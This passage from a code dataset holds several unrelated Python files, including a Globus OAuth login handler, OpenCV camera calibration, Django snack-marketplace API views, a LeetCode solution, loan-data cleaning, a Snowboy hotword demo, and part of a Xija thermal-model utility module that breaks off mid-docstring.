= ['openid', 'profile', 'email',\n 'urn:globus:auth:scope:auth.globus.org:view_identities']\n scope_string = (' ').join(scopes)\n redirect_uri = self.get_callback_url(self)\n client = self.globus_portal_client()\n client.oauth2_start_flow(\n redirect_uri,\n requested_scopes=scope_string,\n refresh_tokens=True)\n # Doing the code for token for id_token exchange\n tokens = client.oauth2_exchange_code_for_tokens(code)\n id_token = tokens.decode_id_token(client)\n username = id_token.get('preferred_username')\n if not username.endswith('@globusid.org'):\n raise HTTPError(403, (\"You are not signed in \"\n \"to your {} account.\".format(\"Globus ID\")))\n # Need to return a username without the \"email\" ending\n username = username.split('@')[0]\n return username\n\n def get_callback_url(self, handler=None):\n \"\"\"\n Getting the configured callback url\n \"\"\"\n if self.oauth_callback_url is None:\n raise HTTPError(500, (\"No callback url provided. \"\n \"Please configure by adding \"\n \"c.GlobusOAuthenticator.oauth_callback_url \"\n \"to the config\"))\n return self.oauth_callback_url\n","sub_path":"oauthenticator/globus.py","file_name":"globus.py","file_ext":"py","file_size_in_byte":3743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"316082032","text":"import numpy as np\nimport cv2\nimport glob\n\ndef calibrate(path='../data/cali/example/', m=4, n=7):\n ''' \n Use opencv to calibrate the camera\n\n Args:\n path: the folder to the calibration pictures\n m,n: the number of grids used for calibration\n (which is not the number of total grids in the cheesebord, but two grids smaller than it)\n\n\n Returns: intrinsic_matrix\n '''\n # termination criteria\n criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.001)\n\n # prepare object points, like (0,0,0), (1,0,0), (2,0,0) ....,(6,5,0)\n objp = np.zeros((n*m,3), np.float32)\n objp[:,:2] = np.mgrid[0:n,0:m].T.reshape(-1,2)\n\n # Arrays to store object points and image points from all the images.\n objpoints = [] # 3d point in real world space\n imgpoints = [] # 2d points in image plane.\n\n path += '*.jpg'\n print(path)\n images = glob.glob(path)\n # print(images)\n h, w = 0, 0\n gray = None\n for fname in images:\n # img = cv2.imread(fname)\n # cv2.imshow('img',img)\n # cv2.waitKey(500)\n img = cv2.imread(fname)\n h, w = img.shape[:2]\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n\n # Find the chess board corners\n ret, corners = cv2.findChessboardCorners(gray, (n,m),None)\n\n # If found, add object points, image points (after refining them)\n if ret == True:\n objpoints.append(objp)\n\n corners2 = cv2.cornerSubPix(gray,corners,(11,11),(-1,-1),criteria)\n imgpoints.append(corners2)\n\n # Draw and display the corners\n img = cv2.drawChessboardCorners(img, (n,m), corners2,ret)\n # cv2.imshow('img',img)\n # cv2.waitKey(500)\n\n cv2.destroyAllWindows()\n\n ret, mtx, dist, _, tvecs = cv2.calibrateCamera(objpoints, imgpoints, gray.shape[::-1],None,None)\n\n intrinsic_matrix, _=cv2.getOptimalNewCameraMatrix(mtx,dist,(w,h),1,(w,h))\n\n print(intrinsic_matrix)\n return intrinsic_matrix","sub_path":"7-3d-pose-estimation-and-objectron/proj5_code/calibration.py","file_name":"calibration.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"374801853","text":"from django.shortcuts import render\nimport urllib.request\nimport urllib.parse\nimport json\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth import hashers\nfrom kafka import KafkaProducer\nfrom elasticsearch import Elasticsearch\n\n# Create your views here.\n\n\ndef index(request):\n\tprint (\"About to perform the GET request...\")\n\treq_snacks = urllib.request.Request('http://models-api:8000/api/v1/snacks/')\n\treq_users = urllib.request.Request('http://models-api:8000/api/v1/users/')\n\tresp_snacks = urllib.request.urlopen(req_snacks).read().decode('utf-8')\n\tresp_users = urllib.request.urlopen(req_users).read().decode('utf-8')\n\tjson_snacks = json.loads(resp_snacks)\n\tjson_users = json.loads(resp_users)\n\treturn_data = {\"status_code:\": 200, \"data\": {\"users\": json_users, \"snacks\": json_snacks}}\n\n\treturn JsonResponse(return_data)\n\ndef sort(request):\n\tprint (\"About to perform the GET request...\")\n\treq_snacks = urllib.request.Request('http://models-api:8000/api/v1/snacks/')\n\tresp_snacks = urllib.request.urlopen(req_snacks).read().decode('utf-8')\n\tjson_snacks = json.loads(resp_snacks)\n\tnewlist = sorted(json_snacks['data'], key=lambda k: k['country']) \n\treturn_data = {\"status_code:\": 200, \"data\": newlist}\n\n\treturn JsonResponse(return_data)\n\n\n@csrf_exempt\ndef details(request,pk):\n\treq_snack = urllib.request.Request('http://models-api:8000/api/v1/snacks/' + pk)\n\tresp_snack = urllib.request.urlopen(req_snack).read().decode('utf-8')\n\tjson_snack = json.loads(resp_snack)\n\t#user_pk = request.COOKIES.get('pk', \"0\")\n\t#send_new_detail = {\"item_id\": pk, 'user_id': user_pk}\n\treturn_data = {\"status_code:\": 200, \"data\": {\"snack\": json_snack}}\n\n\t# Kafka for item and user id, NEED TO GET USER ID\n\t#producer = KafkaProducer(bootstrap_servers='kafka:9092')\n\t#producer.send('spark-job', json.dumps(send_new_detail).encode('utf-8'))\n\n\treturn JsonResponse(return_data)\n\n\ndef recs(request, pk):\n\treq_recs = urllib.request.Request('http://models-api:8000/api/v1/recs/' + pk)\n\tresp_recs = urllib.request.urlopen(req_recs).read().decode('utf-8')\n\tjson_recs = json.loads(resp_recs)\n\t\n\tall_rec_obj = []\n\tif json_recs['status_code'] != '404':\n\t\tdata = json_recs['data']\n\t\trecs = (data['recommended_items']).split(',')\n\t\tfor reccomendation in recs:\n\t\t\treq_snack = urllib.request.Request('http://models-api:8000/api/v1/snacks/' + reccomendation)\n\t\t\tresp_snack = urllib.request.urlopen(req_snack).read().decode('utf-8')\n\t\t\tjson_snack = json.loads(resp_snack)\n\t\t\tall_rec_obj.append(json_snack['data'])\n\n\n\treturn_data = {\"status_code:\": 200, \"data\": all_rec_obj }\n\treturn JsonResponse(return_data)\n\n\n@csrf_exempt\ndef reccomendation(request):\n# Kafka for item and user id, NEED TO GET USER ID\n\tuser_id = request.POST.get(\"user_id\")\n\titem_id = request.POST.get(\"item_id\")\n\tsend_new_detail = {\"item_id\": item_id, 'user_id': user_id}\n\tproducer = KafkaProducer(bootstrap_servers='kafka:9092')\n\tproducer.send('spark-job', json.dumps(send_new_detail).encode('utf-8'))\n\n\treturn JsonResponse(send_new_detail)\n\n\n@csrf_exempt\ndef validate_user(request):\n\treq_users = urllib.request.Request('http://models-api:8000/api/v1/users/')\n\tresp_users = urllib.request.urlopen(req_users).read().decode('utf-8')\n\tjson_users = json.loads(resp_users)['data']\n\n\n\temail = request.POST['email']\n\tpassword = request.POST['password']\n\n\tfor user in json_users:\n\t\tif user['email'] == email and hashers.check_password(password, user['password']):\t\t\t\n\t\t\tauthenticator = urllib.request.Request('http://models-api:8000/api/v1/create_auth/' + str(user['pk']) )\n\t\t\tresp_auth = urllib.request.urlopen(authenticator).read().decode('utf-8')\n\t\t\tjson_auth = json.loads(resp_auth)\n\n\t\t\tif json_auth ['status_code'] == '200':\n\t\t\t\treturn JsonResponse({'status_code': '200', 'auth' : json_auth ['data']['auth'], 'pk': user['pk']})\n\t\n\treturn JsonResponse({'status_code': '404'})\n\n\n\n@csrf_exempt\ndef register(request):\n\tfirst_name = request.POST.get(\"first_name\")\n\tlast_name = request.POST.get(\"last_name\")\n\temail = request.POST.get(\"email\")\n\tphone_number = request.POST.get(\"phone_number\")\n\tpassword = request.POST.get(\"password\")\n\n\turl = 'http://models-api:8000/api/v1/users/create'\n\tdata = {'first_name' : first_name, 'last_name': last_name, 'password': password, 'email': email, 'phone_number': phone_number}\n\tdata = bytes( urllib.parse.urlencode( data ).encode() )\n\thandler = urllib.request.urlopen(url, data);\n\t\n\n\tpost_feedback = handler.read().decode('utf-8')\n\tresp = json.loads(post_feedback)\n\treturn JsonResponse(resp)\n\n@csrf_exempt\ndef create_snack(request):\n\turl = 'http://models-api:8000/api/v1/snacks/create'\n\n\treq_auths = urllib.request.Request('http://models-api:8000/api/v1/auths/')\n\tresp_auths = urllib.request.urlopen(req_auths).read().decode('utf-8')\n\tjson_auths = json.loads(resp_auths)['data']\n\n\tname = request.POST.get(\"name\", \"No name Provided\")\n\tdescription = request.POST.get(\"description\", \"No description Provided\")\n\tprice = request.POST.get(\"price\", 0.00)\n\tnutrition_info = request.POST.get(\"nutrition_info\",\"No nutrition_info Provided\")\n\tcountry = request.POST.get(\"country\", \"No nutrition_info Provided\")\n\tauth = request.POST.get(\"auth\", \"No Auth Provided\")\n\tfor authenticator in json_auths:\n\t\tif authenticator[\"authenticator\"] == auth:\n\t\t\tdata_vals = {'name' : name, 'description': description, 'price': price, 'nutrition_info': nutrition_info, 'country' : country}\n\t\t\t\n\t\t\tdata = bytes( urllib.parse.urlencode( data_vals ).encode() )\n\t\t\thandler = urllib.request.urlopen(url, data);\n\t\t\t\n\n\t\t\tpost_feedback = handler.read().decode('utf-8')\n\t\t\tresp = json.loads(post_feedback)\n\n\t\t\tresp['Data'] = data_vals\n\n\t\t\t##### Kafka section: ######\n\t\t\tproducer = KafkaProducer(bootstrap_servers='kafka:9092')\n\t\t\tsend_new_listing = resp\n\t\t\tproducer.send('new-snack', json.dumps(send_new_listing).encode('utf-8'))\n\t\t\t#### End of Kafka section ####\n\n\t\t\treturn JsonResponse(resp)\n\n\treturn JsonResponse({'status_code': '403'})\n\n@csrf_exempt\ndef search(request):\n\tes = Elasticsearch(['es'])\n\tif request.method == 'POST':\n\t\tquery = request.POST.get('search_input')\n\t\tquery_results = es.search(index='listing_index', body={'query': {'query_string': {'query': query}}, 'size': 10})\n\n\t\tresults = []\n\t\tfor snack in query_results['hits']['hits']:\n\t\t\tresults.append(snack)\n\n\t\treturn JsonResponse({'status_code': '200', 'data': results})\n\n\treturn JsonResponse({'status_code': '500'})\n\n\n@csrf_exempt\ndef logout(request):\n\turl = 'http://models-api:8000/api/v1/destroy_auth/'\n\tcookie = request.POST.get('authenticator_token')\n\tdata = {'authenticator_token' : cookie}\n\tdata = bytes( urllib.parse.urlencode( data ).encode() )\n\thandler = urllib.request.urlopen(url, data);\n\n\treturn JsonResponse({'status_code': '200'})\n\n\n\n","sub_path":"food_world_exp_api/food_world_exp_api_core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"345360791","text":"#\r\n# @lc app=leetcode.cn id=513 lang=python3\r\n#\r\n# [513] 找树左下角的值\r\n#\r\n# https://leetcode-cn.com/problems/find-bottom-left-tree-value/description/\r\n#\r\n# algorithms\r\n# Medium (66.88%)\r\n# Likes: 52\r\n# Dislikes: 0\r\n# Total Accepted: 6.8K\r\n# Total Submissions: 10.1K\r\n# Testcase Example: '[2,1,3]'\r\n#\r\n# 给定一个二叉树,在树的最后一行找到最左边的值。\r\n#\r\n# 示例 1:\r\n#\r\n#\r\n# 输入:\r\n#\r\n# ⁠ 2\r\n# ⁠ / \\\r\n# ⁠ 1 3\r\n#\r\n# 输出:\r\n# 1\r\n#\r\n#\r\n#\r\n#\r\n# 示例 2:\r\n#\r\n#\r\n# 输入:\r\n#\r\n# ⁠ 1\r\n# ⁠ / \\\r\n# ⁠ 2 3\r\n# ⁠ / / \\\r\n# ⁠ 4 5 6\r\n# ⁠ /\r\n# ⁠ 7\r\n#\r\n# 输出:\r\n# 7\r\n#\r\n#\r\n#\r\n#\r\n# 注意: 您可以假设树(即给定的根节点)不为 NULL。\r\n#\r\n#\r\n\r\n# @lc code=start\r\n# Definition for a binary tree node.\r\n# class TreeNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.left = None\r\n# self.right = None\r\n\r\ntry:\r\n import os\r\n import sys\r\n curFileParentPath = os.path.dirname(\r\n os.path.dirname(os.path.realpath(__file__)))\r\n sys.path.append(curFileParentPath)\r\n from typing import *\r\n from collections import defaultdict\r\n from Utils.Tree import *\r\nexcept Exception as err:\r\n print('Import failed: ' + str(err))\r\n\r\n\r\nclass Solution:\r\n def findBottomLeftValue(self, root: TreeNode) -> int:\r\n # 简单的LEVEL ORDER..如果没有新的节点加入则说明是最后一行\r\n q = [root]\r\n while q:\r\n curlen = len(q)\r\n for n in q[:curlen]:\r\n if n.left:\r\n q.append(n.left)\r\n if n.right:\r\n q.append(n.right)\r\n if len(q) == curlen:\r\n return q[0].val\r\n q = q[curlen:]\r\n\r\n\r\n# @lc code=end\r\n","sub_path":"Medium/513.找树左下角的值.py","file_name":"513.找树左下角的值.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"348462974","text":"# %load q02_data_cleaning_all/build.py\n# Default Imports\nimport sys, os\nsys.path.append(os.path.dirname(os.path.dirname(os.path.dirname('__file__'))))\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom greyatomlib.logistic_regression_project.q01_outlier_removal.build import outlier_removal\nfrom sklearn.preprocessing import Imputer\n\nloan_data = pd.read_csv('data/loan_prediction_uncleaned.csv')\nloan_data = loan_data.drop('Loan_ID', 1)\nloan_data = outlier_removal(loan_data)\n\n\n# Write your solution here :\ndef data_cleaning(loan_data):\n X = loan_data.iloc[:,:-1]\n y = loan_data.iloc[:,-1]\n X_train, X_test, y_train, y_test = train_test_split(X,y,random_state = 9, test_size = 0.25)\n X_train_mean = X_train['LoanAmount'].mean()\n X_test_mean = X_test['LoanAmount'].mean()\n X_test.LoanAmount.fillna(X_test_mean,inplace = True)\n X_train.LoanAmount.fillna(X_train_mean,inplace = True)\n \n X_test.Gender.fillna(X_test['Gender'].mode()[0],inplace = True)\n X_test.Married.fillna(X_test['Married'].mode()[0],inplace = True)\n X_test.Dependents.fillna(X_test['Dependents'].mode()[0],inplace = True)\n X_test.Self_Employed.fillna(X_test['Self_Employed'].mode()[0],inplace = True)\n X_test.Loan_Amount_Term.fillna(X_test['Loan_Amount_Term'].mode()[0],inplace = True)\n X_test.Credit_History.fillna(X_test['Credit_History'].mode()[0],inplace = True)\n \n X_train.Gender.fillna(X_test['Gender'].mode()[0],inplace = True)\n X_train.Married.fillna(X_test['Married'].mode()[0],inplace = True)\n X_train.Dependents.fillna(X_test['Dependents'].mode()[0],inplace = True)\n X_train.Self_Employed.fillna(X_test['Self_Employed'].mode()[0],inplace = True)\n X_train.Loan_Amount_Term.fillna(X_test['Loan_Amount_Term'].mode()[0],inplace = True)\n X_train.Credit_History.fillna(X_test['Credit_History'].mode()[0],inplace = True)\n \n return (X,y,X_train,X_test,y_train,y_test)\n \n \n\n\n","sub_path":"q02_data_cleaning_all/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"76480148","text":"# 노드의 범위(0 <= node <= 10000)를 지정해주지 않으면 return할 때까지 범위 바깥을 탐색할 수 있음\n# Queue()를 사용했을때 시간 초과 -> deque() 사용 시 통과\n# if in으로 visited 확인시 visited의 모든 키와 비교해야 해서 딕셔너리라도 효율이 떨어진다. O(N)보다는 효율적이겠지만\n# 그래서 (리스트) visited = [-1]*100001로 초기화 해주고\n# if visited[new_node] != -1로 해주면 O(1) 더 효율적으로 방문 확인 가능\n\n# from queue import Queue\nfrom collections import deque\n\ndef BFS(n, k):\n # q = Queue()\n dq = deque()\n visited = [-1]*100001\n\n # q.put(n)\n dq.append(n)\n visited[n] = 0\n\n while( dq ):\n # node = q.get()\n node = dq.popleft()\n if node == k:\n print(visited[node])\n return\n for new_node in (node+1, node-1, node*2):\n if new_node < 0 or new_node > 100000: continue\n # if new_node in visited: continue\n if visited[new_node] != -1: continue\n # q.put(new_node)\n dq.append(new_node)\n visited[new_node] = visited[node]+1\n\n\n\nif __name__ == \"__main__\":\n N, K = map(int, input().split())\n BFS(N, K)\n\n\n# 이런 방법도 있다\n# while문과 for문의 사용\n# https://home-body.tistory.com/63","sub_path":"1697 숨바꼭질.py","file_name":"1697 숨바꼭질.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"548335173","text":"import snowboydecoder_arecord\nimport sys\nimport signal\n\n\"\"\"\nThis demo file shows you how to use the new_message_callback to interact with\nthe recorded audio after a keyword is spoken. It saves the recorded audio to a \nwav file.\n\"\"\"\n\n\ninterrupted = False\n\n\ndef signal_handler(signal, frame):\n global interrupted\n interrupted = True\n\ndef audioRecorderCallback(fname):\n\tprint (\"call google to STT: \" + fname)\n\ndef interrupt_callback():\n\tglobal interrupted\n\treturn interrupted\n\nif len(sys.argv) == 1:\n print(\"Error: need to specify model name\")\n print(\"Usage: python demo.py your.model\")\n sys.exit(-1)\n\nmodel = sys.argv[1]\n\n# capture SIGINT signal, e.g., Ctrl+C\nsignal.signal(signal.SIGINT, signal_handler)\n\ndetector = snowboydecoder_arecord.HotwordDetector(model, sensitivity=0.5)\nprint('Listening... Press Ctrl+C to exit')\n\ndef audioRecorderCallback(fname):\n\tprint ('file is complete ' + fname)\n\n# main loop\ndetector.start( detected_callback=None, #snowboydecoder_arecord.play_audio_file,\n interrupt_check=interrupt_callback,\n audio_recorder_callback=audioRecorderCallback,\n sleep_time=0.01)\n\ndetector.terminate()\n","sub_path":"examples/Python/demo_arecord2.py","file_name":"demo_arecord2.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"534243016","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\nfrom hashlib import md5\nfrom json import loads as json_loads\nfrom pathlib import Path\nfrom urllib.request import urlopen\nfrom urllib.parse import urljoin\nimport json\nfrom git import Repo\nimport numpy as np # noqa\nfrom scipy import interpolate # noqa\n\nfrom cxotime import CxoTime\nimport xija\nfrom xija import get_model_spec\n\nnon_state_names = {'aacccdpt': ['aca0', ],\n 'pftank2t': ['pf0tank2t', ],\n '4rt700t': ['oba0', ],\n 'pline03t': ['pline03t0', ],\n 'pline04t': ['pline04t0', ],\n 'pm1thv2t': ['mups0', ],\n 'pm2thv1t': ['mups0', 'mups1'],\n '1deamzt': ['dea0', ],\n '1dpamzt': ['dpa0', ],\n 'fptemp_11': ['fptemp', '1cbat', 'sim_px'],\n '1pdeaat': ['pin1at', ],\n '2ceahvpt': ['cea0', 'cea1']}\n\n\ndef get_github_chandra_models_version_info():\n \"\"\" Download a list of all tags and branches, along with associated information.\n\n :return: Dictionary of all tags and branches, along with associated information.\n :rtype: dict\n \"\"\"\n with urlopen('https://api.github.com/repos/sot/chandra_models/tags') as url:\n response = url.read()\n tags = json.loads(response.decode('utf-8'))\n\n with urlopen('https://api.github.com/repos/sot/chandra_models/branches') as url:\n response = url.read()\n branches = json.loads(response.decode('utf-8'))\n\n all_versions_info = {t[\"name\"]: t for t in tags}\n all_versions_info.update({b[\"name\"]: b for b in branches})\n return all_versions_info\n\n\ndef load_github_model_specs(version='master'):\n \"\"\" Load Xija all model parameters for a specified version from https://github.com/sot/chandra_models.\n\n :param version: tag or branch to use\n :type version: str\n\n :return: A dictionary containing the model specifications for all available Xija models for the chandra_models\n version specified\n :rtype: dict\n\n Note:\n This will need to be updated as new models are approved or existing models are renamed.\n \"\"\"\n\n def join_url_parts(repository_root, url_parts):\n return urljoin(repository_root, '/'.join(url_parts).replace('///', '/').replace('//', '/'))\n\n def get_model(model_location):\n \"\"\" Load parameters for a single Xija model.\n\n :param model_location: Relative location of model file, starting from the chandra_models root repository\n location\n\n :return: JSON file stored as a dictionary, md5 hash of file\n \"\"\"\n\n repository_url = 'https://raw.githubusercontent.com/sot/chandra_models/'\n model_spec_url = join_url_parts(repository_url, [version, model_location])\n\n with urlopen(model_spec_url) as url:\n response = url.read()\n f = response.decode('utf-8')\n\n md5_hash = md5(f.encode('utf-8')).hexdigest()\n\n return json_loads(f), md5_hash\n\n model_locations = {\n 'aacccdpt': '/chandra_models/xija/aca/aca_spec.json',\n '1deamzt': '/chandra_models/xija/dea/dea_spec.json',\n '1dpamzt': '/chandra_models/xija/dpa/dpa_spec.json',\n 'fptemp': '/chandra_models/xija/acisfp/acisfp_spec_matlab.json',\n '1pdeaat': '/chandra_models/xija/psmc/psmc_spec.json',\n 'pftank2t': '/chandra_models/xija/pftank2t/pftank2t_spec.json',\n '4rt700t': '/chandra_models/xija/fwdblkhd/4rt700t_spec.json',\n 'pline03t': '/chandra_models/xija/pline/pline03t_model_spec.json',\n 'pline04t': '/chandra_models/xija/pline/pline04t_model_spec.json',\n 'pm1thv2t': '/chandra_models/xija/mups_valve/pm1thv2t_spec.json',\n 'pm2thv1t': '/chandra_models/xija/mups_valve/pm2thv1t_spec_matlab.json',\n '2ceahvpt': '/chandra_models/xija/hrc/cea_spec.json',\n }\n\n all_versions_info = get_github_chandra_models_version_info()\n\n model_specs = {'sha': all_versions_info[version]['commit']['sha'], 'version_info': all_versions_info[version],\n 'version': version}\n\n for msid, path in model_locations.items():\n model_specs[msid], model_specs[msid + '_md5'] = get_model(path)\n model_specs['fptemp_11'] = model_specs['fptemp'] # For backwards compatibility\n model_specs['fptemp_11_md5'] = model_specs['fptemp_md5'] # For backwards compatibility\n\n return model_specs\n\n\ndef load_model_specs(version=None, local_repository_location=None):\n \"\"\" Load Xija model parameters for all available models.\n\n :param version: tag or branch to use\n :type version: str\n :param local_repository_location: location of chandra_models repository, defaults to `get_model_spec.REPO_PATH`\n :type local_repository_location: str\n\n :return: A dictionary containing the model specifications for all available Xija models, along with latest commit\n sha for version specified (or existing branch/tag), branch/tag, and repository state\n :rtype: dict\n\n Note:\n This will need to be updated as new models are approved or existing models are renamed.\n \"\"\"\n\n def get_local_git_version_info(repo):\n \"\"\" Get latest git commit hash for current branch.\n\n :param repo: gitpython Repo object for repository\n :type repo: git.repo.base.Repo\n :return: Latest commit hash, branch/tag, repository state\n :return: dict\n \"\"\"\n\n hexsha, version = repo.commit().name_rev.split()\n modified = repo.is_dirty()\n return {'sha': hexsha, 'version': version, 'modified': modified}\n\n def get_model(model_location):\n \"\"\" Load parameters for a single Xija model.\n\n :param model_location: Relative location of model file, starting from the chandra_models root repository\n location\n :type model_location: str\n\n :return: JSON file stored as a dictionary, md5 hash of file\n :rtype: tuple\n \"\"\"\n\n with open(Path.joinpath(local_repository_location, Path(model_location))) as fid:\n f = fid.read()\n md5_hash = md5(f.encode('utf-8')).hexdigest()\n return json_loads(f), md5_hash\n\n model_locations = {\n 'aacccdpt': 'chandra_models/xija/aca/aca_spec.json',\n '1deamzt': 'chandra_models/xija/dea/dea_spec.json',\n '1dpamzt': 'chandra_models/xija/dpa/dpa_spec.json',\n 'fptemp': 'chandra_models/xija/acisfp/acisfp_spec_matlab.json',\n '1pdeaat': 'chandra_models/xija/psmc/psmc_spec.json',\n 'pftank2t': 'chandra_models/xija/pftank2t/pftank2t_spec.json',\n '4rt700t': 'chandra_models/xija/fwdblkhd/4rt700t_spec.json',\n 'pline03t': 'chandra_models/xija/pline/pline03t_model_spec.json',\n 'pline04t': 'chandra_models/xija/pline/pline04t_model_spec.json',\n 'pm1thv2t': 'chandra_models/xija/mups_valve/pm1thv2t_spec.json',\n 'pm2thv1t': 'chandra_models/xija/mups_valve/pm2thv1t_spec_matlab.json',\n '2ceahvpt': 'chandra_models/xija/hrc/cea_spec.json',\n }\n\n if local_repository_location is None:\n local_repository_location = get_model_spec.REPO_PATH\n else:\n local_repository_location = Path(local_repository_location).expanduser()\n\n with get_model_spec.temp_directory() as repo_path_local:\n repo = Repo.clone_from(local_repository_location, repo_path_local)\n if version is not None:\n _ = repo.git.checkout(version)\n model_specs = get_local_git_version_info(repo)\n\n for msid, path in model_locations.items():\n model_specs[msid], model_specs[msid + '_md5'] = get_model(path)\n model_specs['fptemp_11'] = model_specs['fptemp'] # For backwards compatibility\n model_specs['fptemp_11_md5'] = model_specs['fptemp_md5'] # For backwards compatibility\n\n return model_specs\n\n\ndef get_local_model(filename):\n \"\"\" Load parameters for a single Xija model.\n\n :param filename: File path to local model specification file\n :type filename: str\n :return: Model spec as a dictionary, md5 hash of model spec\n :rtype: tuple\n \"\"\"\n\n with open(filename) as fid: # 'aca/aca_spec.json', 'rb') as fid:\n f = fid.read()\n\n return json.loads(f), md5(f.encode('utf-8')).hexdigest()\n\n\ndef c_to_f(temp):\n \"\"\" Convert Celsius to Fahrenheit.\n\n :param temp: Temperature in Celsius\n :type temp: int or float or tuple or list or np.ndarray\n :return: Temperature in Fahrenheit\n :rtype: int or float or list or np.ndarray\n \"\"\"\n if type(temp) is list or type(temp) is tuple:\n return [c * 1.8 + 32 for c in temp]\n else:\n return temp * 1.8 + 32.0\n\n\ndef f_to_c(temp):\n \"\"\" Convert Fahrenheit to Celsius.\n\n :param temp: Temperature in Fahrenheit\n :type temp: int or float or tuple or list or np.ndarray\n :return: Temperature in Celsius\n :rtype: int or float or list or np.ndarray\n \"\"\"\n if type(temp) is list or type(temp) is tuple:\n return [(c - 32) / 1.8 for c in temp]\n else:\n return (temp - 32.0) / 1.8\n\n\ndef setup_model(msid, t0, t1, model_spec, init):\n \"\"\" Create Xija model object\n\n This function creates a Xija model object with initial parameters, if any. This function is intended to create a\n streamlined method to creating Xija models that can take both single value data and time defined data\n (e.g. [pitch1, pitch2, pitch3], [time1, time2, time3]), defined in the `init` dictionary.\n\n :param msid: Primary MSID for model; in this case it can be anything as it is only being used to name the model,\n however keeping the convention to name the model after the primary MSID being predicted reduces confusion\n :type msid: str\n :param t0: Start time for model prediction; this can be any format that cxotime.CxoTime accepts\n :type t0: str or float or int\n :param t1: End time for model prediction; this can be any format that cxotime.CxoTime accepts\n :type t1: str or float or int\n :param model_spec: Dictionary of model parameters or file location where parameters can be imported\n :type model_spec: dict, str\n :param init: Dictionary of Xija model initialization parameters, can be empty\n :type init: dict\n :rtype: xija.model.XijaModel\n\n Example::\n\n model_specs = load_model_specs()\n init = {'1dpamzt': 35., 'dpa0': 35., 'eclipse': False, 'roll': 0, 'vid_board': True, 'pitch':155,\n 'clocking': True, 'fep_count': 5, 'ccd_count': 5, 'sim_z': 100000}\n model = setup_model('1dpamzt', '2019:001:00:00:00', '2019:010:00:00:00', model_specs['1dpamzt'], init)\n\n Notes:\n\n - This does not run the model, only sets up the model to be run.\n - Any parameters not specified in `init` will either need to be pulled from telemetry or explicitly defined \\\n outside of this function before running the model.\n\n \"\"\"\n\n model = xija.ThermalModel(msid, start=t0, stop=t1, model_spec=model_spec)\n for key, value in init.items():\n if isinstance(value, dict):\n model.comp[key].set_data(value['data'], value['times'])\n else:\n model.comp[key].set_data(value)\n\n return model\n\n\ndef run_profile(times, schedule, msid, model_spec, init, pseudo=None):\n \"\"\" Run a Xija model for a given time and state profile.\n\n :param times: Array of time values, in seconds from '1997:365:23:58:56.816' (cxotime.CxoTime epoch)\n :type times: np.ndarray\n :param schedule: Dictionary of pitch, roll, etc. values that match the time values specified above in `times`\n :type schedule: dict\n :param msid: Primary MSID for model being run\n :type msid: str\n :param model_spec: Dictionary of model parameters or file location where parameters can be imported\n :type model_spec: dict or string\n :param init: Dictionary of Xija model initialization parameters, can be empty but not recommended\n :type init: dict\n :param pseudo: Name of one or more pseudo MSIDs used in the model, if any, only necessary if one\n wishes to retrieve model results for this pseudo node, if it exists\n :type pseudo: str or None, optional\n :returns: Results, keys are node names (e.g. 'aacccdpt', 'aca0'), values are Xija model component objects\n :rtype: dict\n\n Example::\n\n times = np.array(CxoTime(['2019:001:00:00:00', '2019:001:12:00:00', '2019:002:00:00:00',\n '2019:003:00:00:00']).secs)\n pitch = np.array([150, 90, 156, 156])\n schedule = {'pitch': pitch}\n model_specs = load_model_specs()\n init = {'1dpamzt': 20., 'dpa0': 20., 'eclipse': False, 'roll': 0, 'vid_board': True, 'clocking': True,\n 'fep_count': 5, 'ccd_count': 5, 'sim_z': 100000}\n results = run_profile(times, pitch, '1dpamzt', model_specs['1dpamzt'], init, pseudo='dpa0')\n\n Note:\n\n Any parameters specified in `init` will be overwritten by those specified in the body of this function, if they\n happen to be defined in both places.\n \"\"\"\n\n model = setup_model(msid, times[0], times[-1], model_spec, init)\n\n for key, value in schedule.items():\n model.comp[key].set_data(value, times=times)\n\n model.make()\n model.calc()\n tmsid = model.get_comp(msid)\n results = {msid: tmsid}\n\n if pseudo is not None:\n results[pseudo] = model.get_comp(pseudo)\n\n return results\n\n\ndef calc_binary_schedule(datesecs, state1, state2, t_dwell1, t_dwell2, msid, model_spec, init, duration=2592000.,\n t_backoff=1725000., pseudo=None):\n \"\"\" Simulate a schedule that switches between two states\n\n This runs the model over a \"binary\" schedule. This function is intended to be used to optimize the `t_dwell2`\n parameter so that the predicted temperature during the last `t_backoff` number of seconds reaches a limit within a\n tolerance (limit used and specified in a different function).\n\n :param datesecs: Date for start of simulation, in seconds from '1997:365:23:58:56.816' (cxotime.CxoTime epoch)\n :type datesecs: float or int\n :param state1: States for fixed dwell (pitch, roll, ccds, etc.)\n :type state1: dict\n :param state2: States for variable dwell (pitch, roll, ccds, etc.)\n :type state2: dict\n :param t_dwell1: Fixed dwell duration in seconds\n :type t_dwell1: float or int\n :param t_dwell2: Variable dwell duration in seconds (this is the parameter that is optimized)\n :type t_dwell2: float or int\n :param msid: Primary MSID for model being run\n :type msid: str\n :param model_spec: Dictionary of model parameters or file location where parameters can be imported\n :type model_spec: dict, string\n :param init: Dictionary of Xija model initialization parameters\n :type init: dict\n :param duration: Duration for entire simulated schedule, defaults to 30 days (in seconds)\n :type duration: float, optional\n :param t_backoff: Duration for tail end of simulated schedule used to determine convergence, defaults to 10 days\n (in 